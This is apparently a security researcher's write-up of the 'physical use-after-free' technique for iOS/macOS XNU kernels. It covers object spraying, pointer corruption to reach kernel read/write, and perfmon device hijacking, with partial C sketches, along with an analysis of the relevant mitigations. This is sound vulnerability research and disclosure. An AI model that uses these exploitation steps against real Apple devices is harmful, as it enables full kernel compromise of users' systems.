- What is a PUAF primitive?
- What to do before a PUAF exploit?
- What to do after a PUAF exploit?
- Impact of XNU mitigations on PUAF exploits
- Appendix: Discovery of the PUAF primitive
PUAF is an acronym for "physical use-after-free". As opposed to a normal UAF, which stems from a
dangling pointer to a virtual address (VA), a PUAF originates from a dangling pointer to the
physical address (PA) of a memory region. Although PA pointers could be stored in other kernel data
structures, here it will be assumed that the dangling PA pointer is contained directly in a
leaf-level page table entry (i.e. an L3 PTE in the case of iOS and macOS) from the page table
hierarchy of the exploiting user process. In addition, in order to qualify as a PUAF primitive, it
will also be assumed that the corresponding physical page has been put back on the free list. In
XNU, every physical page of memory is represented by a `vm_page` structure, whose `vmp_q_state` field determines which queue the page is on, and whose `vmp_pageq` field contains 32-bit packed pointers to the next and previous pages in that queue. Note that the main "free list" in XNU is represented by `vm_page_queue_free`, which is an array of `MAX_COLORS` (128) queues (although the actual number of free queues used depends on the device configuration). Finally, although a dangling
PTE with read-only access in the AP bits (e.g. P0 issue 2337) would still be considered an
important security vulnerability, it would not be directly exploitable. Therefore, in this write-up,
a PUAF primitive entails that the dangling PTE gives read/write access to user space in the AP bits.
To summarize, in order to obtain a PUAF primitive, we must achieve a dangling L3 PTE with read/write
access on a physical page which has been put back on the free list, such that the kernel can grab it
and reuse it for absolutely anything!
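
As a rough illustration of those structures (not the real XNU definitions, which live in the osfmk/vm directory and contain many more fields), the relevant layout can be pictured like this:

```c
#include <stdint.h>

// Simplified sketch of a vm_page: vmp_pageq chains the page into whichever
// queue vmp_q_state says it is on, using 32-bit packed pointers.
typedef struct {
    uint32_t next; // packed pointer to the next vm_page in the queue
    uint32_t prev; // packed pointer to the previous vm_page in the queue
} vmp_pageq_sketch_t;

struct vm_page_sketch {
    vmp_pageq_sketch_t vmp_pageq;   // queue linkage
    unsigned int       vmp_q_state; // which queue this page is currently on
    /* ...many other fields omitted... */
};

// The main free list is an array of queues ("colors"), although how many of
// them are actually used depends on the device configuration:
#define MAX_COLORS 128
// extern struct vm_page_queue_free_head vm_page_queue_free[MAX_COLORS];
```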
As mentioned above, once a PUAF primitive has been achieved, the corresponding physical pages could be reused for anything. However, if the higher-privileged Page Protection Layer (PPL) is running out of free pages in `pmap_ppl_free_page_list`, the regular kernel might grab pages from its own free queues and give them to PPL by calling `pmap_mark_page_as_ppl_page_internal()`. That said, this PPL routine will verify that the given page is indeed not mapped outside of the physical aperture, or else it will trigger a "page still has mappings" panic. But since a PUAF primitive requires a dangling PTE, this check would always fail and cause a kernel panic. Therefore, after obtaining PUAF pages, we must avoid marking them as PPL-owned. Hence, before starting a PUAF exploit, we should attempt to fill `pmap_ppl_free_page_list` as much as possible, such that PPL is less likely to run
out of free pages during the critical section of the exploit. Fortunately, we can easily allocate PPL-owned pages by calling `vm_allocate()` with the flag `VM_FLAGS_FIXED` for all addresses aligned to the L2 block size inside the allowed VA range of our VM map. If there were previously no mappings in that L2 block, then PPL will first need to allocate an L3 translation table to accommodate the new mapping. Then, we can simply deallocate those mappings and PPL will put the empty L3 translation table pages back in `pmap_ppl_free_page_list`. This is done in the function `puaf_helper_give_ppl_pages()`, located in puaf.h.
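
Here is a minimal sketch of that idea; it is not the actual `puaf_helper_give_ppl_pages()`, and it assumes 16 KiB pages (so one L2 block spans 32 MiB) and that the caller passes in the allowed VA range:

```c
#include <mach/mach.h>
#include <mach/mach_vm.h>

// One L2 block covers 2048 L3 entries of 16 KiB each, i.e. 32 MiB (assumption).
#define L2_BLOCK_SIZE (2048ull * 16384ull)

// Sketch: map and then unmap a single page per L2 block, so that PPL first
// allocates and then reclaims an L3 translation table for each block, thereby
// filling pmap_ppl_free_page_list.
static void give_ppl_pages_sketch(mach_vm_address_t min_addr, mach_vm_address_t max_addr)
{
    mach_vm_address_t addr = (min_addr + L2_BLOCK_SIZE - 1) & ~(L2_BLOCK_SIZE - 1);
    for (; addr + vm_page_size <= max_addr; addr += L2_BLOCK_SIZE) {
        mach_vm_address_t fixed_addr = addr;
        // VM_FLAGS_FIXED: force the mapping at this exact L2-block-aligned address.
        if (mach_vm_allocate(mach_task_self(), &fixed_addr, vm_page_size, VM_FLAGS_FIXED) != KERN_SUCCESS) {
            continue;
        }
        // Removing the only mapping in the block lets PPL put the now-empty L3
        // translation table page back on its free list.
        mach_vm_deallocate(mach_task_self(), fixed_addr, vm_page_size);
    }
}
```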
On macOS, the maximum VA that is mappable by a user process (i.e. `current_map()->max_offset`) is quite high, such that we can fill the PPL page free list with an extremely large number of pages. However, on iOS, the maximum VA is much lower, such that we can only fill it with roughly 200 pages.
Despite that, I almost never run into the "page still has mappings" panic, even when the exploit is
configured to obtain 2048 PUAF pages, which works great for personal research. Please note that a
higher number of PUAF pages makes it easier for the rest of the exploit to achieve a kernel
read/write primitive. That said, for maximum reliability, if the PUAF exploit is repeatable (e.g.
PhysPuppet), an attacker could instead obtain a PUAF primitive on a smaller number of pages, then
attempt to get the kernel read/write primitive, and repeat the process as needed if the latter part
did not succeed.
Let's suppose that we have successfully exploited a vulnerability to obtain a PUAF primitive on an arbitrary number of physical pages. Now what? Note that free pages are added at the tail of the free queues by the `vm_page_queue_enter()` macro, but there is no way from user space to know exactly where our PUAF pages are going to be located in those free queues. In order to remedy that, we can do the following:
- Run some code that will grab a few pages from the free queues and populate them with unique and recognizable content.
- Scan all the PUAF pages for that recognizable content by reading through the dangling PTEs.
- If we find the content, then we have reached the PUAF pages in one of the free queues, so we can move on to the next stage. Otherwise, we go back to step 1 to grab a few more pages, and we repeat this loop until we finally hit the PUAF pages.
This stage of the exploit could probably be optimized tremendously to take into account the fact that `vm_page_queue_free` is made up of an array of free queues. However, as it stands, the exploit will simply grab free pages in chunks of 4 by calling `vm_copy()` on a purgeable source region, until a quarter of the PUAF pages have been successfully grabbed. This is a gross heuristic that completely wastes 25% of the PUAF pages, but it has worked exceedingly well for me, so I never had to optimize it further. This is done in the function `krkw_helper_grab_free_pages()`, located in krkw.h, which I might upgrade in the future.
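
For illustration, a single iteration of that heuristic might look like the sketch below; it is not the actual `krkw_helper_grab_free_pages()`, and the `puaf_pages_va` array (the user VAs backed by the dangling PTEs) and the marker value are assumptions:

```c
#include <mach/mach.h>
#include <stdbool.h>
#include <stdint.h>
#include <string.h>

// Sketch: grab free pages in a chunk of 4 via vm_copy() on a purgeable source
// region, then check whether the marker now shows up through a dangling PTE.
static bool grab_and_scan_sketch(vm_address_t *puaf_pages_va, size_t n_pages, uint64_t marker)
{
    vm_size_t chunk_size = 4 * vm_page_size;
    vm_address_t src = 0;
    vm_address_t dst = 0;

    // Purgeable source: the copy below cannot be satisfied with copy-on-write,
    // so the kernel grabs fresh physical pages from the free queues.
    vm_allocate(mach_task_self(), &src, chunk_size, VM_FLAGS_ANYWHERE | VM_FLAGS_PURGABLE);
    for (vm_size_t off = 0; off < chunk_size; off += sizeof(marker)) {
        memcpy((void *)(src + off), &marker, sizeof(marker));
    }
    vm_allocate(mach_task_self(), &dst, chunk_size, VM_FLAGS_ANYWHERE);
    vm_copy(mach_task_self(), src, chunk_size, dst);

    // If a grabbed page happens to be one of our PUAF pages, the marker is now
    // visible through the corresponding dangling PTE.
    for (size_t i = 0; i < n_pages; i++) {
        if (*(volatile uint64_t *)(puaf_pages_va[i]) == marker) {
            return true;
        }
    }
    return false;
}
```

In the real exploit, this is repeated in a loop until roughly a quarter of the PUAF pages have been hit.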
Now that our PUAF pages are likely to be grabbed, we can turn the PUAF primitive into a more powerful kernel read/write primitive with the following high-level strategy:
- Spray an "interesting" kernel object, such that it is reallocated in one of the remaining PUAF pages.
- Scan the PUAF pages through the dangling PTEs for a "magic value" to confirm the successful reallocation and to identify exactly which PUAF page contains the target kernel object.
- Overwrite a non-PAC'ed kernel pointer in the target kernel object with a fully controlled value, by directly overwriting it through the appropriate dangling PTE. It would also be possible to craft a set of fake kernel objects within the PUAF pages if necessary, but none of the methods described below require that.
- Get a kernel read or kernel write primitive through a syscall that makes use of the overwritten kernel pointer.
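
The scan in the second step is just a linear read through the dangling PTEs. A generic sketch (all names and parameters are placeholders for illustration) could look like this:

```c
#include <stdint.h>
#include <stddef.h>

// Sketch: scan every PUAF page, at every plausible object offset, for the
// magic value planted in the sprayed kernel object. Returns the user VA of
// the dangling mapping that now overlaps the target object, or 0 on failure.
static uint64_t scan_puaf_pages_for_magic(uint64_t *puaf_pages_va, size_t n_pages,
                                          size_t page_size, size_t object_stride,
                                          size_t magic_offset, uint64_t magic)
{
    for (size_t i = 0; i < n_pages; i++) {
        for (uint64_t object = puaf_pages_va[i];
             object + object_stride <= puaf_pages_va[i] + page_size;
             object += object_stride) {
            if (*(volatile uint64_t *)(object + magic_offset) == magic) {
                return object;
            }
        }
    }
    return 0;
}
```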
For example, in my original exploit for PhysPuppet, I was inspired by SockPuppet and decided to target socket-related objects. Thus, the generic steps listed above would map to the specific actions listed below:
- Spray `inp_tp` structures with the `socket()` syscall.
- Scan the PUAF pages for the magic value in the `t_keepintvl` field, which has been set with the `setsockopt()` syscall for the `TCP_KEEPINTVL` option.
- Overwrite the `inp6_outputopts` field, which is a pointer to an `ip6_pktopts` structure.
- Get a 4-byte kernel read primitive from `inp6_outputopts->ip6po_minmtu` with the `getsockopt()` syscall for the `IPV6_USE_MIN_MTU` option, and get a 4-byte kernel write primitive restricted to values between -1 and 255 from `inp6_outputopts->ip6po_tclass` with the `setsockopt()` syscall using the `IPV6_TCLASS` option.
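
For illustration, here is a hedged sketch of how those primitives are driven from user space once `inp6_outputopts` has been redirected; it assumes `s` is one of the sprayed `AF_INET6` TCP sockets, and it omits the pointer-offset handling and error checking of the real exploit code:

```c
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/tcp.h>
#include <stdint.h>

// Plant the magic value used to recognize the sprayed inp_tp in the PUAF pages:
// TCP_KEEPINTVL stores its value in the t_keepintvl field.
static void spray_magic_sketch(int s, int magic)
{
    setsockopt(s, IPPROTO_TCP, TCP_KEEPINTVL, &magic, sizeof(magic));
}

// 4-byte kernel read: returns inp6_outputopts->ip6po_minmtu, so the overwritten
// pointer must be aimed such that ip6po_minmtu overlaps the target address.
static uint32_t kread32_socket_sketch(int s)
{
    int value = 0;
    socklen_t len = sizeof(value);
    getsockopt(s, IPPROTO_IPV6, IPV6_USE_MIN_MTU, &value, &len);
    return (uint32_t)value;
}

// Restricted 4-byte kernel write: stores a value between -1 and 255 into
// inp6_outputopts->ip6po_tclass.
static void kwrite32_socket_sketch(int s, int value)
{
    setsockopt(s, IPPROTO_IPV6, IPV6_TCLASS, &value, sizeof(value));
}
```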
However, I was not really satisfied with this part of the exploit because the kernel write primitive was too restricted and the required syscalls (i.e. `socket()` and `[get/set]sockopt()`) are all denied from the WebContent sandbox. That said, when I found the vulnerability for Smith, which was exploitable from WebContent unlike PhysPuppet, I decided to look for other interesting target kernel objects which could be sprayed from the WebContent sandbox, such that the entire exploit satisfied that constraint. Unlike the socket method described above, which used the same target kernel object for both the kernel read and write primitives, I ended up finding distinct objects for the two primitives.
Here is the description of the `kread_kqueue_workloop_ctl` method:
- Spray `kqworkloop` structures with the `kqueue_workloop_ctl()` syscall.
- Scan the PUAF pages for the magic value in the `kqwl_dynamicid` field, which has been set directly by `kqueue_workloop_ctl()` above.
- Overwrite the `kqwl_owner` field, which is a pointer to a `thread` structure.
- Get an 8-byte kernel read primitive from `kqwl_owner->thread_id` with the `proc_info()` syscall for the `PROC_INFO_CALL_PIDDYNKQUEUEINFO` callnum.
And here is the description of the `kwrite_dup` method:
- Spray `fileproc` structures with the `dup()` syscall (to duplicate any file descriptor).
- This time, no fields can be set to a truly unique magic value for the `fileproc` structure. Therefore, we scan the PUAF pages for the expected bit pattern of the entire structure. Then, we use the `fcntl()` syscall with the `F_SETFD` cmd to update the value of the `fp_flags` field to confirm the successful reallocation and to identify exactly which file descriptor owns that `fileproc` object (see the sketch after this list).
- Overwrite the `fp_guard` field, which is a pointer to a `fileproc_guard` structure.
- Get an 8-byte kernel write primitive from `fp_guard->fpg_guard` with the `change_fdguard_np()` syscall. However, that method cannot overwrite a value of 0, nor overwrite any value to 0.
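
As an illustration of the second step above, the confirmation loop might look like the sketch below; the pointer to the candidate `fp_flags` field inside the PUAF page and the list of sprayed file descriptors are assumptions for illustration:

```c
#include <fcntl.h>
#include <stdint.h>
#include <stddef.h>

// Sketch: toggle FD_CLOEXEC on each sprayed fd and watch whether fp_flags
// changes at the candidate location inside the PUAF page; the fd that causes
// the change owns the reallocated fileproc.
static int find_fileproc_fd_sketch(volatile uint32_t *fp_flags_in_puaf_page,
                                   const int *sprayed_fds, size_t n_fds)
{
    for (size_t i = 0; i < n_fds; i++) {
        uint32_t before = *fp_flags_in_puaf_page;
        fcntl(sprayed_fds[i], F_SETFD, FD_CLOEXEC);
        uint32_t after = *fp_flags_in_puaf_page;
        fcntl(sprayed_fds[i], F_SETFD, 0); // restore (assumes no flags were set before)
        if (before != after) {
            return sprayed_fds[i];
        }
    }
    return -1;
}
```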
This worked well enough, and at the time of writing, all the syscalls used by those methods are part of the WebContent sandbox. However, although the `proc_info()` syscall is allowed, the `PROC_INFO_CALL_PIDDYNKQUEUEINFO` callnum is denied. Therefore, I had to find another kernel read primitive. Fortunately, it was pretty easy to find one by looking at the other callnums of `proc_info()` which are allowed by the WebContent sandbox.
Here is the description of the `kread_sem_open` method:
- Spray `psemnode` structures with the `sem_open()` syscall.
- Once again, no fields can be set to a truly unique magic value for the `psemnode` structures. Therefore, we scan the PUAF pages for four consecutive structures, which should contain the same `pinfo` pointer in the first 8 bytes and zero padding in the second 8 bytes. Then, we increment the `pinfo` pointer by 4 through the dangling PTE and we use the `proc_info()` syscall to retrieve the name of the POSIX semaphore, which should now be shifted by 4 characters when we hit the right file descriptor.
- Overwrite the `pinfo` field, which is a pointer to a `pseminfo` structure.
- Get an 8-byte kernel read primitive from `pinfo->psem_uid` and `pinfo->psem_gid` with the `proc_info()` syscall for the `PROC_INFO_CALL_PIDFDINFO` callnum, which is not denied by the WebContent sandbox (see the sketch after this list).
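
As a hedged sketch of the last step, the 8-byte read can be driven through the public `proc_pidfdinfo()` wrapper around `proc_info()`; the exact structure fields and how the two 32-bit halves are assembled are assumptions here:

```c
#include <libproc.h>
#include <sys/proc_info.h>
#include <unistd.h>
#include <stdint.h>

// Sketch: once the psemnode's pinfo pointer has been redirected through the
// dangling PTE, the kernel reports psem_uid and psem_gid from the faked
// pseminfo, i.e. 8 attacker-chosen bytes, via the semaphore's stat info.
static uint64_t kread64_sem_open_sketch(int sem_fd)
{
    struct psem_fdinfo info = {0};
    proc_pidfdinfo(getpid(), sem_fd, PROC_PIDFDPSEMINFO, &info, sizeof(info));
    uint64_t lo = (uint32_t)info.pseminfo.psem_stat.vst_uid;
    uint64_t hi = (uint32_t)info.pseminfo.psem_stat.vst_gid;
    return (hi << 32) | lo; // which half is which is an assumption
}
```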
Please note that `shm_open()`, which is also part of the WebContent sandbox, could also be used to achieve a kernel read primitive, in much the same way as `sem_open()`. However, `sem_open()` makes it easier to determine the address of `current_proc()` through the semaphore's `owner` field.
Lastly, the `kwrite_sem_open` method works just like the `kwrite_dup` method, but the `fileproc` structures are sprayed with the `sem_open()` syscall instead of the `dup()` syscall.
At this point, we have a decent kernel read/write primitive, but there are some minor encumbrances:
- The kernel read primitive successfully reads 8 bytes from `pinfo->psem_uid` and `pinfo->psem_gid`, but it also reads other fields of the `pseminfo` structure located before and after those two. This can cause problems if the address we want to read is located at the very beginning of a page. In that case, the fields before `psem_uid` and `psem_gid` would end up in the previous virtual page, which might be unmapped and therefore cause a "Kernel data abort" panic. Of course, in such a case, we could use a variant that is guaranteed to not underflow a page by using the first bytes read from the modified kernel pointer. This is done in the function `kread_sem_open_kread_u32()`.
- The kernel write primitive cannot overwrite a value of 0, nor overwrite any value to 0. There are simple workarounds for both scenarios. For example, the function `smith_helper_cleanup()` uses such a workaround to overwrite a value of 0. The workaround to overwrite a value to 0 is left as an exercise for the reader.
Although we can overcome these impediments easily, it would be nice to bootstrap a better kernel read/write from those initial primitives. This is achieved in perf.h, but libkfd only supports this part of the exploit on the iPhone 14 Pro Max for certain versions of iOS (see the supported versions in the function `perf_init()`). Currently, I am using some static addresses from those kernelcaches to locate certain global kernel objects (e.g. `perfmon_devices`), which cannot be found easily by chasing data pointers. It would probably be possible to achieve the same outcome dynamically by chasing offsets in code, but this is left as an exercise for the reader for now. As it stands, here is how the setup for the better kernel read/write is achieved:
1. We call `vm_allocate()` to allocate a single page, which will be used as a shared buffer between user space and kernel space later on. Note that we also call `memset()` to fault in that virtual page, which will grab a physical page and populate the corresponding PTE (see the sketch after this list).
2. We call `open("/dev/aes_0", O_RDWR)` to open a file descriptor. Please note that we could open any character device which is accessible from the target sandbox, because we will corrupt it later on to redirect it to `"/dev/perfmon_core"` instead.
3. We use the kernel read primitive to obtain the slid address of the function `vn_kqfilter()` by chasing the pointers `current_proc()->p_fd.fd_ofiles[fd]->fp_glob->fg_ops->fo_kqfilter`, where "fd" is the opaque file descriptor returned by the `open()` syscall in the previous step.
4. We calculate the kernel slide by subtracting the static address of `vn_kqfilter()` in the kernelcache from its slid address. We then make sure that the base of the kernelcache contains the expected Mach-O header.
5. We use the kernel read primitive to scan the `cdevsw` array until we find the major index for `perfmon_cdevsw`, which seems to always be 0x11.
6. From the `fileglob` structure we found earlier, we use the kernel read primitive to retrieve the original `dev_t` from `fg->fg_data->v_specinfo->si_rdev`, and we use the kernel write primitive to overwrite it such that it indexes into `perfmon_cdevsw` instead. In addition, the `si_opencount` field is incremented by one to prevent `perfmon_dev_close()` from being called if the process exits before calling `kclose()`, which would trigger a "perfmon: unpaired release" panic.
7. We use the kernel read primitive to retrieve a bunch of useful globals (`vm_pages`, `vm_page_array_beginning_addr`, `vm_page_array_ending_addr`, `vm_first_phys_ppnum`, `ptov_table`, `gVirtBase`, `gPhysBase`, and `gPhysSize`), as well as TTBR0 from `current_pmap()->ttep` and TTBR1 from `kernel_pmap->ttep`.
8. We can then manually walk our page tables, starting from TTBR0, to find the physical address of the shared page allocated in step 1. And since we retrieved the `ptov_table` in the previous step, we can then use `phystokv()` to find the kernel VA for that physical page inside the physmap.
9. Finally, we use the kernel write primitive to corrupt the `pmdv_config` field of the first perfmon device to point to the shared page (i.e. with the kernel VA retrieved in the previous step), and to set the `pmdv_allocated` boolean field to `true`.
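
For illustration, steps 1 and 2 boil down to a couple of standard calls (a minimal sketch, not the actual code in perf.h):

```c
#include <fcntl.h>
#include <mach/mach.h>
#include <mach/mach_vm.h>
#include <string.h>

// Step 1: allocate the shared page and fault it in with memset(), so that a
// physical page is grabbed and the corresponding L3 PTE is populated.
static mach_vm_address_t setup_shared_page_sketch(void)
{
    mach_vm_address_t shared_page = 0;
    mach_vm_allocate(mach_task_self(), &shared_page, vm_page_size, VM_FLAGS_ANYWHERE);
    memset((void *)shared_page, 0, vm_page_size);
    return shared_page;
}

// Step 2: open any character device reachable from the target sandbox; its
// dev_t will later be redirected to perfmon_cdevsw.
static int open_device_sketch(void)
{
    return open("/dev/aes_0", O_RDWR);
}
```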
At this point, the setup is complete. To read kernel memory, we can now craft a `perfmon_config` structure in the shared page, as shown in the image below, then use the `PERFMON_CTL_SPECIFY` ioctl to read between 1 and 65535 bytes from an arbitrary kernel address. In addition, note that the region being read must satisfy the `zone_element_bounds_check()` in `copy_validate()`, because this technique uses `copyout()` under the hood.
To write kernel memory, we can now craft a `perfmon_config`, `perfmon_source` and `perfmon_event` structure in the shared page, as shown in the image below, then use the `PERFMON_CTL_ADD_EVENT` ioctl to write 8 bytes to an arbitrary kernel address. That said, at that point, `kwrite()` can accept any size that is a multiple of 8 because it will perform this technique in a loop.
Finally, on `kclose()`, the function `perf_free()` will restore the `si_rdev` and `si_opencount` fields to their original values, such that all relevant kernel objects are cleaned up properly when the file descriptor is closed. However, if the process exits before calling `kclose()`, this cleanup will be incomplete and the next attempt to `open("/dev/aes_0", O_RDWR)` will fail with `EMFILE`.
Therefore, it would be cleaner to use the kernel write primitive to "manually" close the
device-specific kernel objects of that file descriptor, such that the process could exit at any
moment and still leave the kernel in a clean state. For now, this is left as an exercise for the
reader.
So, how effective were the various iOS kernel exploit mitigations at blocking the PUAF technique? The mitigations I considered were KASLR, PAN, PAC, PPL, `zone_require()`, and `kalloc_type()`:
- KASLR does not really impact this technique since we do not need to leak a kernel address in order to obtain the PUAF primitive in the first place. Of course, we eventually want to obtain the addresses of the kernel objects that we want to read or write, but at that point, we have endless possibilities of objects to spray inside the PUAF pages in order to gather that information.
- PAN also does not really have an impact on this technique. Although none of the kread and kwrite methods I described above required us to craft a set of fake kernel objects, other methods could. In that case, the absence of PAN would be useful. However, in practice, there are plenty of objects that could leak the address of the PUAF pages in kernel space, such that we could craft those fake objects directly in those PUAF pages.
- PAC as a form of control flow integrity is completely irrelevant for this technique as it is a form of data-only attack. That said, in my opinion, PAC for data pointers is the mitigation that currently has the biggest impact on this technique, because there are a lot more kernel objects that we could target in order to obtain a kernel read/write primitive if certain members of those structures had not been signed.
- PPL surprisingly does very little to prevent this technique. Of course, it prevents the PUAF pages from being reused as page tables and other PPL-protected structures. But in practice, it is very easy to dodge the "page still has mappings" panic and to reuse the PUAF pages for other interesting kernel objects. I expect this to change!
- `zone_require()` has a similar impact as data-PAC for this technique, by preventing us from forging kernel pointers inside the PUAF pages if they are verified with this function.
- `kalloc_type()` is completely irrelevant for this technique as it only provides protection against virtual address reuse, as opposed to physical address reuse.
First of all, I want to be clear that I do not claim to be the first researcher to discover this primitive. As far as I know, Jann Horn of Google Project Zero was the first researcher to publicly report and disclose dangling PTE vulnerabilities:
- P0 issue 2325, reported on June 29, 2022 and disclosed on August 24, 2022.
- P0 issue 2327, reported on June 30, 2022 and disclosed on September 19, 2022.
In addition, TLB flushing bugs could be considered a variant of the PUAF primitive, which Jann Horn found even earlier:
- P0 issue 1633, reported on August 15, 2018 and disclosed on September 10, 2018.
- P0 issue 1695, reported on October 12, 2018 and disclosed on October 29, 2018.
For iOS, I believe Ian Beer was the first researcher to publicly disclose a dangling PTE vulnerability, although with read-only access:
- P0 issue 2337, reported on July 29, 2022 and disclosed on November 25, 2022.
Please note that other researchers might have found similar vulnerabilities earlier, but these are the earliest ones I could find. I reported PhysPuppet to Apple a bit before Ian Beer's issue was disclosed to the public and, at that time, I was not aware of Jann Horn's research. Therefore, in case it is of interest to other researchers, I will share how I stumbled upon this powerful primitive. When I got started doing vulnerability research, during the first half of 2022, I found multiple buffer overflows in the SMBClient kernel extension and a UAF in the in-kernel NFS client (i.e. a normal UAF that reuses a VA and not a PA). However, given that I was pretty inexperienced with exploitation back then and that Apple had already delivered a lot of mitigations for classical memory corruption vulnerabilities, I had no idea how to exploit them. My proofs-of-concept would only trigger "one-click" remote kernel panics, but that quickly became unsatisfying. Therefore, during the second half of 2022, I decided to look for better logic bugs in the XNU kernel. In particular, I was inspired to attack physical memory by Brandon Azad's blog post One Byte to rule them all. That said, his technique required a one-byte linear heap overflow primitive (amongst other things) to gain the arbitrary physical mapping primitive. But I was determined to avoid memory corruption, so I decided to look for other logic bugs that could allow a user process to control the physical address entered in one of its own PTEs. After spending a lot of time reading and re-reading the VM map and pmap code, I eventually came to the conclusion that obtaining an arbitrary physical mapping primitive as an initial primitive would be unrealistic. Fortunately, I got incredibly lucky right after that!
As I was perusing the code in `vm_map.c` for the thousandth time, I was struck by just how many functions would assert that the start and end addresses of a `vm_map_entry` structure are page-aligned (e.g. in `vm_map_enter()`, `vm_map_entry_insert()`, `vm_map_entry_zap()`, and many other functions). Given that those assertions are not enabled in release builds, I was curious to know what would happen if we could magically create an "unaligned entry" in our VM map. For example, if the `vme_start` field was equal to a page-aligned address A but the `vme_end` field was equal to A + PAGE_SIZE + 1, how would the functions `vm_fault()` and `vm_map_delete()` behave? To my astonishment, I realized that this condition would trivially lead to a dangling PTE. That said, at that point in time, this was just an idea, albeit a very promising one! Therefore, I went on to look for logic bugs that could allow an attacker to create such an unaligned entry. First, I investigated all the attack surface that was reachable from the WebContent sandbox, but I was not able to find such a bug there. However, after giving up on a vulnerability reachable from WebContent, I quickly came across the MIG routine `mach_memory_object_memory_entry_64()` and found the vulnerability for PhysPuppet, which is covered in detail in a separate write-up.
After that, I checked online for existing exploits that achieved a PUAF primitive. At that time, I
could not find any for iOS but that is when I stumbled upon Jann Horn's Mali issues. As a quick
aside, I also skimmed his blog post about exploiting a simple Linux memory corruption bug,
which I mistakenly thought was a variant of the PUAF primitive with a dangling PTE in kernel space
rather than user space. I later realized that this was just a normal UAF, but I got confused because
he exploited it through the page allocator by reallocating the victim page as a page table. That
said, I knew this would not be possible on iOS because of the formidable PPL. However, as I was
already familiar with Ned Williamson's SockPuppet exploit, I had a pretty solid hunch that I
could exploit the dangling PTEs by reallocating socket-related objects inside the PUAF pages, then
by using the `getsockopt()`/`setsockopt()` syscalls in order to obtain the kernel read/write primitives, respectively.